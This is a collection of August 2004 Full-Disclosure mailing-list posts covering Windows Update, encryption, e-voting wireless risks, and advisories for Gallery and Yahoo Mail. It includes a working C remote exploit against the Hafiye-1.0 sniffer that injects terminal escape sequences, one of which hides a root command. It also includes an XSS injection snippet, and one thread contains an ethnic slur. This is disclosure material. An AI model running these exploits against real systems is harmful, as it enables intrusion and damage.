RE: !SPAM! RE: [Full-Disclosure] The 'good worm' from HP
Yes it can. See the docs. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of The Central ScroutinizerSent: Monday, August 23, 2004 16:29To: [EMAIL PROTECTED]Subject: !SPAM! RE: [Full-Disclosure] The 'good worm' from HP >It's called WindowsUpdate? That cannot be used locally/internally by an organization. Aaron
[Full-Disclosure] Netfilter Conntrack
I know this is so not the right place to ask this, but most of the people from netfilter-dev are total asshats and trying to get any sort of info from them is a bitch. Does any one know of a decent way to delete an entry from the conntrack ( in c ) ive written an lkm to try access ip_conntrack_tuple and ip_conntrack to list and delete from there but so far my attempts have been worthless. so im asking you guys for [EMAIL PROTECTED]@!!! chur VeNoMouS
[Full-Disclosure] found suspicious desktop.ini in startup folders
Does anyone know if this file is used in an exploit since it was found in startup folders ? The contents of the file are: [.ShellClassInfo] [EMAIL PROTECTED],-21787 BillyBob desktop.ini Description: Binary data
Re: [Full-Disclosure] Re-write with security in mind all ops.
On Mon, 23 Aug 2004 14:22:42 PDT, "Gregory A. Gilliss" said: > People, believe it or not, before there was Dubya, before there were mad > rag heads disgracing one of the world's most civilized religions, before > Sir Tim Berners-Lee 'invented' the Web, there was a network of people > who shared information pretty freely and who, occasionally, would shell > out of an app and gain root somewhere. All in all, it wasn't bad at all. Yes.. I was around in that day and age. However, I'll also note that by and large, the people who would occasionally shell out weren't the sort of people who were actively trying to blow me up. Also, calling them "mad rag heads" is a bad idea - considered as a purely military matter, they managed to pull off an operation that caused 3,000+ casualties on our side and only 19 on theirs. Militarily, we got our butts kicked. And 3 years later, after invading 2 countries, we still don't even know where their leader is. They're tech-savvy, using crypto to good effect, and ditched their use of cell phones when they learned we knew how to track them. Consider that a very large chunk of our info was only obtained when we accidentally busted our own mole in the organization - what does that tell you about relative skill levels? ObSecurity: Demeaning the enemy with labels may be good training for Marines, where dehumanizing the enemy to make it easier to kill them in combat may be a good idea. It's a bad idea when trying to out-guess a clever opponent's next move, when you know beforehand they're at least as clever as you. > Now we have "no unencrypted links" which is a nice way of saying "I bet > I can keep you off my swings". Funny how someone with a citigroup.com > email is making such bold security claims. Two words - Vladimir Levin. On the other hand, note that Citigroup is a bank and financial services organization. Would *YOU* trust a bank that *didnt* say "I bet I can keep you off my swings/vaults/account info"? Would you trust a bank that didn't do all reasonable steps to secure themselves (and in this day and age, there's little to no excuse for an unencrypted link for critical data)? Personally, if I found my bank *wasnt* making such "bold security claims", I'd find a new bank quickly > In case you haven't figured it out yet from the caustic replies you've > received, around here the only credibility is clue. Abbreviations and > boasting count for diddly. One of the more ironic things I've seen on this list to date pgpvD9DJnRapP.pgp Description: PGP signature
Re: [Full-Disclosure] Re-write with security in mind all ops.
Gregory A. Gilliss wrote: ...before there were mad rag heads disgracing one of the world's most civilized religions... ...before there was you, being an ass... grow up! the rag-head thing is so passé, it makes your argument fall apart, makes you look like an ass, and makes any chance of me taking you seriously go out the window. -d ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Fwd: Re: FullDisclosure: Security aspects of time synchronization infrastructure
On Sun, 22 Aug 2004 12:33:50 CDT, Robert Brown said: > Also, what about a GPS time receiver on a moving vehicle, such as a > ship at sea? They would not necessarily know that the location > information was wrong, unles they also had other means of determining > location. Besides, it might only be *SLIGHTLY* wrong, but wrong > enough to cause the time signal to be off enough to cause the > application to produce erroneous results. It all depends on the > application. An aquaintance of mine had a very early GPS unit (back in the days when not all the satellites were up there yet, and the intentional fuzzing for civilian units was in place). He was driving through San Francisco, and the unit was offering direction to his destination. The box was experiencing occasional temporary delusions of what street he's on, and gives him directions from a side street next to US101 back onto US101 proper (which in fact he was already on). Then he heads across the bridge to Oakland, and on the way it has another delusion.. And decides it's on Alcatraz Island, and promptly crashes because it can't find a way to get from here to there Moral - sometimes "slightly wrong" is quite enough to cause a total failure... pgpXub9Aai1iy.pgp Description: PGP signature
Re: [Full-Disclosure] The 'good worm' from HP
On Mon, 23 Aug 2004 01:34:32 BST, The Central Scroutinizer said: > Would it not be better to have a standard secure backdoor provided by a > security package that could downloaded or installed by disk and works hand > in hand with port scanning software, if this is really necassary. I am No, it would not be a good idea. > supprised Microsoft have not released such a peice of software; maybe a > third party have. Many third parties have done so, going all the way back to BackOrifice. Think it through - there's 2 basic possibilities: 1) The machine is a Windows machine that's centrally administered and controlled via Active Directory or similar system, as in many corporate environments. In the AD world, it's well understood how to push fixes via Group Policy, and other central-management schemes already have their own schemes for doing it (even if it's a 'for i in `cat boxes.to.update`; do ssh $i...'). So in these environments, you don't need a backdoor. 2) The box isn't a member of an Active Directory or other similar distributed-management scheme. In this case, you don't want a back door, because you have no sane way to validate who's doing the push of software. So you can't securely use a backdoor. pgpG6eQu9Odov.pgp Description: PGP signature
RE: [Full-Disclosure] Windows Update
You are correct, I look into this deeper this morning and found the same results. It doesn't matter if it is running or not. It can be running and set to manual, WindowsUpdate will still fail. Therefore you have to set the service to autotmaic for WindowsUpdate to work. It is Microsoft's attempt to force all users to have automatic updates on by default. This is fine for your everyday normal at home user but it is a pain for corporations. People that use SUS need it anyways, so it isn't a big deal. But we use SMS and I had the service all to save resources. It was a service that was going to never work correctly anyways (due to corporate proxy). Therefore to make company turn on a unneeded service after telling everyone to turn off all unneeded services for security is pretty lame. Once again, I see a need to have a separate OS base for corporations and home customers. But I am glad to see the death of the Win9x kernel. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael Schaefer Sent: Monday, August 23, 2004 2:17 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Update It looks like windows update requires Automated Updates to be set to automatic startup, but does not require the process to actually be running... So the statement that they are "required" is obviously false. As a work around, I can manually change the startup status, do the windows update, then change the startup status back to manual. Seriously annoying, but doable. < ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re-write with security in mind all ops.
As someone who's been around for a few years, replies like this cause me to sit up and ask "who let you on?" People, believe it or not, before there was Dubya, before there were mad rag heads disgracing one of the world's most civilized religions, before Sir Tim Berners-Lee 'invented' the Web, there was a network of people who shared information pretty freely and who, occasionally, would shell out of an app and gain root somewhere. All in all, it wasn't bad at all. Now we have "no unencrypted links" which is a nice way of saying "I bet I can keep you off my swings". Funny how someone with a citigroup.com email is making such bold security claims. Two words - Vladimir Levin. In case you haven't figured it out yet from the caustic replies you've received, around here the only credibility is clue. Abbreviations and boasting count for diddly. G On or about 2004.08.23 13:10:12 +, Clairmont, Jan M ([EMAIL PROTECTED]) said: > Having worked on NATO security specs and other highly secured > networks. It wouldn't be that hard, just no unencrypted traffic > and no unencrypted interprocess communication. Spammers and bozos would have to work > a lot harder for their fun. > > You can laugh all you want happy boy, but that is what is coming > next. Get used to it. -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED] Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Re-write with security in mind all ops.
It is a never ending battle. Crackers and hash/encryption algorithms, stealth and radar, viruses and anti-virus. The war must be continued. If encyption was built into the underlying subsystem of modern operating systems (without a huge hit on performance), then the security of systems world wide would increase. Strong encryption on interprocess communcation would be a good start (yet the service passwords are still in the registry ;) Will this stop the cracker that will sit on your WEP for a year to access your one wireless pc at the house. No. But it is another loop to make them step thru, and none of us like loops. =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Feher Tamas Sent: Monday, August 23, 2004 1:42 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Re-write with security in mind all ops. >It wouldn't be that hard, just no unencrypted traffic and no >unencrypted interprocess communication. >Spammers and bozos would have to work a lot harder Except for important crypto was broken... nothing is safe: http://www.computerworld.com/printthis/2004/0,4814,95343,00.html "Opinion: Cryptanalysis of MD5 and SHA: Time for a new standard by Bruce Schneier, Counterpane, 19 Aug 2004 Crypto researchers report weaknesses in common hash functions At the Crypto 2004 conference in Santa Barbara, Calif., this week, researchers announced several weaknesses in common hash functions. These results, while mathematically significant, aren't cause for alarm. But even so, it's probably time for the cryptography community to get together and create a new hash standard. One-way hash functions are a cryptographic construct used in many applications. They are used with public-key algorithms for both encryption and digital signatures. They are used in integrity checking. They are used in authentication. They have all sorts of applications in a great many different protocols. Much more than encryption algorithms, one-way hash functions are the workhorses of modern cryptography. In 1990, Ron Rivest invented the hash function MD4. In 1992, he improved on MD4 and developed another hash function: MD5. In 1993, the National Security Agency published a hash function very similar to MD5, called the Secure Hash Algorithm (SHA). Then in 1995, citing a newly discovered weakness that it refused to elaborate on, the NSA made a change to SHA. The new algorithm was called SHA-1. Today, the most popular hash function is SHA-1, with MD5 still being used in older applications. One-way hash functions are supposed to have two properties. One, they're one-way. This means that it's easy to take a message and compute the hash value, but it's impossible to take a hash value and re- create the original message. (By "impossible," I mean "can't be done in any reasonable amount of time.") Two, they're collision-free. This means that it's impossible to find two messages that hash to the same hash value. The cryptographic reasoning behind these two properties is subtle, and I invite curious readers to learn more in my book Applied Cryptography. Breaking a hash function means showing that either -- or both -- of those properties aren't true. Cryptanalysis of the MD4 family of hash functions has proceeded in fits and starts over the past decade or so, with results against simplified versions of the algorithms and partial results against the whole algorithms. This year, Eli Biham and Rafi Chen, and separately Antoine Joux, announced some pretty impressive cryptographic results against MD5 and SHA. Collisions have been demonstrated in SHA. And there are rumors, unconfirmed at this writing, of results against SHA-1. The magnitude of these results depends on who you are. If you're a cryptographer, this is a huge deal. While not revolutionary, these results are substantial advances in the field. The techniques described by the researchers are likely to have other applications, and we'll be better able to design secure systems as a result. This is how the science of cryptography advances: We learn how to design new algorithms by breaking other algorithms. In addition, algorithms from the NSA are considered a sort of alien technology: They come from a superior race with no explanations. Any successful cryptanalysis against an NSA algorithm is an interesting data point in the eternal question of how good they really are in there. As a user of cryptographic systems -- as I assume most readers are -- this news is important, but not particularly worrisome. MD5 and SHA aren't suddenly insecure. No one is going to be breaking digital signatures or reading encrypted messages anytime soon with these techniques. The electronic world is no less secure after these announcements than it was before. But there's an old saying inside the NSA: "Attacks always get better; they never get worse." These techniques will continue to improve, and probably someday there will be practical attacks based on these techniques
[Full-Disclosure] Windows update - XPSP2
For all of you who think you HAVE to turn auto update on, you do NOT have to do that! You can go to: http://www.microsoft.com/downloads/details.aspx?FamilyID=049c9dbe-3b8e-4f30-8245-9e368d3cdb5a&DisplayLang=en and then click on the Download button to the right to download it. Once downloaded, you can double click on it to install it. I don't like having auto update on - never HAVE liked it. So, I downloaded it that way and installed it. I hope this finally resolves this issue! Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Update
Michael Schaefer wrote: It looks like windows update requires Automated Updates to be set to automatic startup, but does not require the process to actually be running... So the statement that they are "required" is obviously false. As a work around, I can manually change the startup status, do the windows update, then change the startup status back to manual. Seriously annoying, but doable. It's a little bit more than seriously annoying, though. It represents a very poor design choice. Obviously, if this setting change works, it means that the automatic update client is not actually necessary to install patches from windowsupdate. I could see the service requirement *if* Microsoft were piggybacking the installation code off of the client in an effort to no longer rely on installing the code with an ActiveX control, however what this demonstrates is that the only reason to do this check is strictly to ensure that automatic updates is running. This is either a bug or a very poor design choice. If the idea is to ensure that everyone has automatic update running, then it's going fail. The people who are getting their updates from WindowsUpdate are not the people you generally need to worry about getting their patches -- it's the people who don't know about WindowsUpdate and who don't have automatic update running that you have to worry about. What I'm saying is that warning people is good; blocking people is bad. It's kind of like not letting someone get a medical checkup if they don't check their blood sugar everyday. It hurts people more than it helps. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: Re: [Full-Disclosure] Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept
On Fri, 20 Aug 2004 23:56:42 -0400, Chris Kelly <[EMAIL PROTECTED]> wrote: > > #!/usr/bin/php > > Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept > > By aCiDBiTS [EMAIL PROTECTED] 17-August-2004 > > ++ Vulnerability description ++ > > > > Gallery (http://gallery.sf.net/) is a PHP image gallery script. Having > > permission to upload photos in some album and the temporal directory is in > > the webtree, then it is possible to create a file with any extension and > > content. Tested in v 1.4.4, maybe older versions also vulnerable. > > > > When uploading photos with the "URL method", they are saved in the temporal > > directory before processing them. Any file with any content is accepted. > > After downloading, the file is processed (discarded if it is not an image) > > and deleted from the temporal directory. > > > > When the script downloads the file to the temporal directory there's the > > function set_time_limit() that by default waits 30 seconds to abort the > > process if no more data is recieved and the transfer connection isn't > > closed. If the temporal directory is in the webtree, during this 30 seconds > > timeout we can access to the file, executing it. > > > > There's also a "directory disclosure" that I've used to determine if the > > temporal directory is in gallery's webtree. It consists in sending a longer > > filename than permited by the filesystem for the image upload name. > > We are disappointed that you made no effort to get in touch with us > about this issue before announcing it on full-disclosure, which > prevented us from having a fix ready at the same time. raped > A fix has been > made and both an update patch (1.4.4-sr1) and full release (1.4.4-pl1, > which also fixes some other minor non-security related bugs) are > available for download as of 11:00pm EST August 20th 2004. > > download information: > http://sourceforge.net/project/showfiles.php?group_id=7130 > > release information: > http://gallery.sourceforge.net/article.php?sid=134 > > -Chris Kelly > Gallery Project Manager > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > AcIdBiTS owned Gallery.sourceforge.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Using CHKROOTKIT
Like most of you know using chkrootkit can help you by detecting very malicious hackers from keeping access to your hacked servers. What will be explained in this special release paper is HOW is does such a great job and why you should use it too just in case you're the kind of person who does not have an up to date list of good security software. More about chkrootkit... CHKROOTKIT is a software who's name is recognized as the state of the art in rootkit detection. Written in bash CHKROOTKIT is skilled in the calling of other programs written in C that can perform over complicated procedures that are very good for that kind of work. Chkrootkit benefits of high level programs to gather very specific information about a system. Take it from a real hacker: use chkrootkit on a daily basis prevents your reputation, integrity and is stress releaving. I *strongly* recommend it. As a hacker I can tell you that CHKROOTKIT made my work harder to a point where I decided to change my profession to security professional. Please send me all sort of information to my gmail email. But bee Nice. da m0nk3y, k1ng 0f b44n4n4 1sl4ndz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Electronic Voting Machines - WinVote by Adv anced Voting Solutions
Dewd, On Sat, 21 Aug 2004 11:11:21 -0700, David L. Dill <[EMAIL PROTECTED]> wrote: > > So far as I know, no one denies that denial of service attacks against > wireless are basically unstoppable. However, wireless interfaces in > touch-screen machines are not intended for use during actual voting. > They are for downloading ballots before the election, and, sometimes, > uploading results after the election. Yes plus me adds the sentence 'This is a good security tekneeq.'. > The primary concerns about wireless are computer security concerns. > I am personally VERY concerned. It's very hard to make sure that > wireless connections are turned off during the election, and wireless > opens lots of security threats that wouldn't be serious otherwise. > First in thing important I will introduce you to will fallow in the next sentence. It is possible depending on the network device used to determine if it is active or not or if it is and is disabled or not. Second thing to say, Murphy is a whitehat. We beleive electronic voting is the future voting system do not think too much about security or you will loose track of your ideas. Instead make it simple wireless. Mistakes will happen. You know you are right even if you thought about this. Overall these are good reflections. > > > Not long ago I sent out a mail regarding electronic voting, it was > > related to a politically motivated thread though so many likely filtered > > it. I suggest anyone interested take a tour of the verified voting > > website. They have fairly in depth coverage and information you may find > > useful. I also suggest you take the time to get involved and have an impact. > > > > http://www.verifiedvoting.org/ > > > > It is a US based site and debate however there is plenty of information > > on worldwide usage of paperless voting systems for others that may be > > interested. > > > > > > Mister Coffee wrote: > > > Actually, no it's not illegal, and no, it's not especially dangerous. > > > While FCC regs require Ham operators to use the "lowest practical > > > power" in their communications, that is something that's open to > > > interpretation. Hams on some freqs crank out 1500 watts quite > > > readily - and safely. We're not talking about a WiFi card in your > > > laptop, or a cell phone next to your head - there are safety > > > considerations and limits of exposure and such. But your statement > > > that it's illegal and dangerous is patently untrue for the amature > > > radio crowd. > > > > > > Hams are, incidently, the Primary Users for the lower 6 channels (US > > > spec) used by WiFi. > > > > > > Cheers, L4J > > > > > > > > > On Fri, Aug 20, 2004 at 09:50:43AM -0300, James Tucker wrote: > > > > > >> Of course the power ranges you quote are also illegal, not to > > >> mention extremely dangerous. > > >> > > >> On Thu, 19 Aug 2004 10:21:49 -0500, Michael Williamson > > >> <[EMAIL PROTECTED]> wrote: > > >> > > >>> Using 802.11 for anything remotely critical is outright STUPID. > > >>> > > >>> FCC regulations are such that these part 15 devices (802.11, > > >>> cordless phones, baby monitors) have no legal protection from > > >>> interference from licensed services (amateur radio, TV stations, > > >>> etc). If I'm running a high powered (10-100 watt) maybe signal > > >>> at 2.4 ghz for amateur radio TV and happen to be living across > > >>> the street from an election center, they're basically screwed. > > >>> As a matter a fact, if their 802.11 is interfering with my > > >>> licensed operation, it is they who must shut down. > > >>> > > >>> -Michael > > >>> > > >>> > > >>> > > >>> > > >>> > > Without even commenting on the "security" of WEP, it seems to > > me that a massive DDOS attack against the voting machines could > > prevent vote tallies from being counted in a timely manner. > > >>> > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > pwnd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Yahoo! E-mail Service Vulnerability
Yahoo! E-mail Service Vulnerability Release Date: August 23, 2004 Severity: Critical (Potential web-based e-mail worm) Systems Affected: Other web-based e-mail systems may be vulnerable. Internet Explorer and any software application used for reading Yahoo e-mail messages. (The ActiveX payload is relevant only for Internet Explorer) Finjan Software notification sent to Yahoo! on May 24, 2004. Status: Yahoo! has already patched their Web-based e-mail services on July 16, 2004. Other web-based e-mail systems may be vulnerable. Description: Finjan Software identified a new critical cross site scripting vulnerability in Yahoo’s Web-based e-mail service. This vulnerability allowed hackers to develop an attack that could have caused significant computer damage during regular Internet use. This vulnerability resulted from the failure of Yahoo’s active content filter to adequately block ActiveX controls and other active content components, and affected all Windows based system platforms that read e-mail messages using Yahoo Web-mail service. Active X controls are downloadable programs that run with the same rights and privileges as the user, allowing access to files and personal information stored on a local hard drive or shared folder. A no-click attack could have launched automatically once a user opened an e-mail message. For example, the vulnerability could have also potentially allowed a worm to read Windows address book, replicate and send itself to everyone in the address book, and have this process repeat at an exponential rate. It could have also harvested email addresses from local files, just like any other worm, and use the Yahoo web-mail vulnerability to send the email messages. Other web-based e-mail systems may be vulnerable to this vulnerability. Technical details: The potential worm could do anything that the user could do. It is a potentially automatic attack. Users had to simply read the infected email message. This was a cross-site scripting vulnerability of the Yahoo! Web-based e-mail service. There are two variants of this vulnerability. The purpose of Yahoo's active content filter is to block the injection of any active content into Yahoo! messages. However, the basic failure that allowed this vulnerability is that there was no blocking of a backslash that is used instead of the import rule. An example: <[EMAIL PROTECTED] "http://www.finjan.com/mcrc/file.css";--> The injected _javascript_ code inside the CSS file is responsible for: -Getting cookies. -Automatic launching of malicious code. -A possible identity theft using a spoofed re-login window. -Sending an e-mail message. The injected ActiveX control can be used for a destructive payload of the propagating worm. The basic attack does not require an ActiveX control. The ActiveX control is the payload that can be used to extend the attack to non-web mail users, or to perform any malicious activity, including formatting of the hard disk. Upon using the ActiveX control, end user may get a security warning. It depends on the security setting of the browser. An example: http://www.finjan.com/SecurityLab/SecurityTestingCenter/activex.asp (Click on the 'test me' button after reading the disclaimer) Credit: Bitlance Winter provided the initial tip. Finjan Software's Malicious Code Research Center (MCRC) has expanded it. Protection: This specific vulnerability has been eliminated by Yahoo based on Finjan Software notification. Finjan's content security products provided proactive defense against this Yahoo! vulnerability prior to its detection and correction. Finjan's patented behavior blocking engine will protect computer users from similar future vulnerabilities and comparable potential exploits. Credit: Bitlance Winter , Dror Shalev and Menashe Eliezer. Finjan Software Malicious Code Research Center (MCRC) department http://www.finjan.com/mcrc Prevention is the best cure! *Finjan SoftwareThis e-mail and any attached files are confidential and may be legallyprivileged. The unauthorized use, disclosure or copying of this email orany information contained within it is strictly prohibited. This alsoconfirms that Finjan Software's Vital Security for E-Mail has scanned thismessage for the presence of known viruses and potentially maliciouscode.Finjan Software - Prevention is the Best Cure!*
[Full-Disclosure] Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability
+---[ Software ]--+
Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer."
+---[ Tested Versions ]--+
Hafiye[1.0]
Tested on:Linux(Hafiye compiled from tarball)
FreeBSD 4.7 (Installed from CD)
+---[ Vulnerability ]--+
Packet Payload Terminal Escape Sequence Injection Vulnerability.
Results: DoS/Remote Root Comprimise
+---[ Description ]--+
Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer.
It runs with uid0 privilege.
Hafiye-1.0 doesnt filter the payload when printing it to the terminal.
A malicious attacker can send packets with escape sequence payloads
to exploit this vulnerability.
If Hafiye has been started with -n packet count option ,
the vulnerability could allow remote code execution.
For remote code execution the victim must press Enter after program exit.
+---[ Contact ]--+
http://deicide.siyahsapka.org
[EMAIL PROTECTED]
+---[ Proof Of Concept Exploit ]--+
/* Remote Exploit for Hafiye-1.0
** Terminal Escape Sequence Injection Vulnerability
** Written by Serkan Akpolat
** Homepage: http://deicide.siyahsapka.org
** E-mail: [EMAIL PROTECTED]
** Greets: Virulent, gorny and all other netricians
*/
#include
#include
#include
#include
#include
#include
#include
typedef struct _target {
char *host;
u_short port;
unsigned int sequence;
unsigned int cnt;
} target;
char *esc_sequence[]= {"Escape Sequences",
"\x1b""]2;Insecure?""\x07\x0a",
"\x07\x07\x07\x07\x07\x07",
"\x1b""]2;;echo Owned > /root/Owned.txt"
"\x07\x1b""[21t""\x1b""]2;xterm""\x07"
"Abnormal Termination""\x1b"
"[8m;""\x0a"};
char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n"
"\t Escape Sequences :\n"
"\t1-Change TitleBar Text to \"Insecure?\"\n"
"\t2-Ring The Bell\n"
"\t3-Hidden Prompt to Create Owned.txt in /root\n"
"\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n";
void usage()
{
printf("%s",use);
exit(1);
}
int connect_to_host(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
herror("Error:");
exit(1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
exit(1);
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
exit(1);
printf("[+] Connected to %s\n", host);
return sock;
}
int main(int argc, char **argv)
{
int i;
int sock = 0;
char buf[256]="\0";
target target;
memset(&target,0,sizeof(target));
while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) {
switch (i) {
case 'h':
target.host = optarg;
break;
case 'p':
target.port = (u_short)atoi(optarg);
break;
case 'e':
target.sequence = atoi(optarg);
if(target.sequence < 1 || target.sequence > 3) {
usage();
}
break;
case 'l':
target.cnt=atoi(optarg);
if(target.cnt<1) {
target.cnt=1;
}
break;
case ':':
case '?':
default:
usage();
exit(1);
}
}
if (optind != argc || !target.host || !target.port ||
!target.sequence || !target.cnt) {
usage();
}
sock = connect_to_host(target.host, target.port);
strncpy(buf,esc_sequence[target.sequence],sizeof(buf)-1);
printf("[+] Sending Escape Sequences\n");
do {
if (send(sock, buf, strlen(buf), 0) < 0) {
printf("Socket Error\n");
exit(1);
}
target.cnt--;
} while(target.cnt > 0);
close(sock);
return 0;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows Update
It looks like windows update requires Automated Updates to be set to automatic startup, but does not require the process to actually be running... So the statement that they are "required" is obviously false. As a work around, I can manually change the startup status, do the windows update, then change the startup status back to manual. Seriously annoying, but doable. < ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Re-write with security in mind all ops.
>It wouldn't be that hard, just no unencrypted traffic >and no unencrypted interprocess communication. >Spammers and bozos would have to work a lot harder Except for important crypto was broken... nothing is safe: http://www.computerworld.com/printthis/2004/0,4814,95343,00.html "Opinion: Cryptanalysis of MD5 and SHA: Time for a new standard by Bruce Schneier, Counterpane, 19 Aug 2004 Crypto researchers report weaknesses in common hash functions At the Crypto 2004 conference in Santa Barbara, Calif., this week, researchers announced several weaknesses in common hash functions. These results, while mathematically significant, aren't cause for alarm. But even so, it's probably time for the cryptography community to get together and create a new hash standard. One-way hash functions are a cryptographic construct used in many applications. They are used with public-key algorithms for both encryption and digital signatures. They are used in integrity checking. They are used in authentication. They have all sorts of applications in a great many different protocols. Much more than encryption algorithms, one-way hash functions are the workhorses of modern cryptography. In 1990, Ron Rivest invented the hash function MD4. In 1992, he improved on MD4 and developed another hash function: MD5. In 1993, the National Security Agency published a hash function very similar to MD5, called the Secure Hash Algorithm (SHA). Then in 1995, citing a newly discovered weakness that it refused to elaborate on, the NSA made a change to SHA. The new algorithm was called SHA-1. Today, the most popular hash function is SHA-1, with MD5 still being used in older applications. One-way hash functions are supposed to have two properties. One, they're one-way. This means that it's easy to take a message and compute the hash value, but it's impossible to take a hash value and re- create the original message. (By "impossible," I mean "can't be done in any reasonable amount of time.") Two, they're collision-free. This means that it's impossible to find two messages that hash to the same hash value. The cryptographic reasoning behind these two properties is subtle, and I invite curious readers to learn more in my book Applied Cryptography. Breaking a hash function means showing that either -- or both -- of those properties aren't true. Cryptanalysis of the MD4 family of hash functions has proceeded in fits and starts over the past decade or so, with results against simplified versions of the algorithms and partial results against the whole algorithms. This year, Eli Biham and Rafi Chen, and separately Antoine Joux, announced some pretty impressive cryptographic results against MD5 and SHA. Collisions have been demonstrated in SHA. And there are rumors, unconfirmed at this writing, of results against SHA-1. The magnitude of these results depends on who you are. If you're a cryptographer, this is a huge deal. While not revolutionary, these results are substantial advances in the field. The techniques described by the researchers are likely to have other applications, and we'll be better able to design secure systems as a result. This is how the science of cryptography advances: We learn how to design new algorithms by breaking other algorithms. In addition, algorithms from the NSA are considered a sort of alien technology: They come from a superior race with no explanations. Any successful cryptanalysis against an NSA algorithm is an interesting data point in the eternal question of how good they really are in there. As a user of cryptographic systems -- as I assume most readers are -- this news is important, but not particularly worrisome. MD5 and SHA aren't suddenly insecure. No one is going to be breaking digital signatures or reading encrypted messages anytime soon with these techniques. The electronic world is no less secure after these announcements than it was before. But there's an old saying inside the NSA: "Attacks always get better; they never get worse." These techniques will continue to improve, and probably someday there will be practical attacks based on these techniques. It's time for us all to migrate away from SHA-1. Luckily, there are alternatives. The National Institute of Standards and Technology (NIST) already has standards for longer --and harder-to- break -- hash functions: SHA-224, SHA-256, SHA-384 and SHA-512. They're already government standards and can already be used. This is a good stopgap, but I'd like to see more. I'd like to see NIST orchestrate a worldwide competition for a new hash function, like it did for the new encryption algorithm, Advanced Encryption Standard, to replace Data Encryption Standard. NIST should issue a call for algorithms and conduct a series of analysis rounds, where the community analyzes the various proposals with the intent of establishing a new standard. Most of the hash functions we have and all the ones in widespread use are based on the general principles of MD4. Clearly
Re: [Full-Disclosure] Re-write with security in mind all ops.
Having worked on NATO security specs and other highly secured networks. It wouldn't be that hard, just no unencrypted traffic and no unencrypted interprocess communication. Spammers and bozos would have to work a lot harder for their fun. You can laugh all you want happy boy, but that is what is coming next. Get used to it. Jan Clairmont Firewall Administrator/Consultant (302) 323-3616 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Nick FitzGerald Sent: Friday, August 20, 2004 10:31 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write code with security in mind Clairmont, Jan M wrote: <> > ... So > what is the alternative? > > Go to a totally secure network computing system like the military? Hahahahahahahahahahahahahaha... ... Oh, you didn't think you were making a funny?? Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro.
No one was ever do that? That is up there on the possible scale with a encrypted zip file that is mailed to a user and asked them to input the word, open the zip and run the file. That would never happenwait.. =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Ron DuFresne Sent: Friday, August 20, 2004 3:10 PM To: Matthew Farrenkopf Cc: Todd Towles; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. yet, if I read this properly it wasnpt simply and open e-mail attachment issue was it, it was open attachment then make suggested changes to the system issue wasn't it? If I understood the problem, then it really requres more then a simple luser, it requires the most stupid of lusers for it to take. and in that case, we're perhaps better off with them DOS'ed? thanks, Ron DuFresne > > However, this would still make it prime for a DoS attack by the next > strain of e-mail virus. And most users who are not knowledgeable > (those who would be opening the attachment in the first place) would > probably not understand why they, now, cannot connect to the Internet. > > Matt ~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. 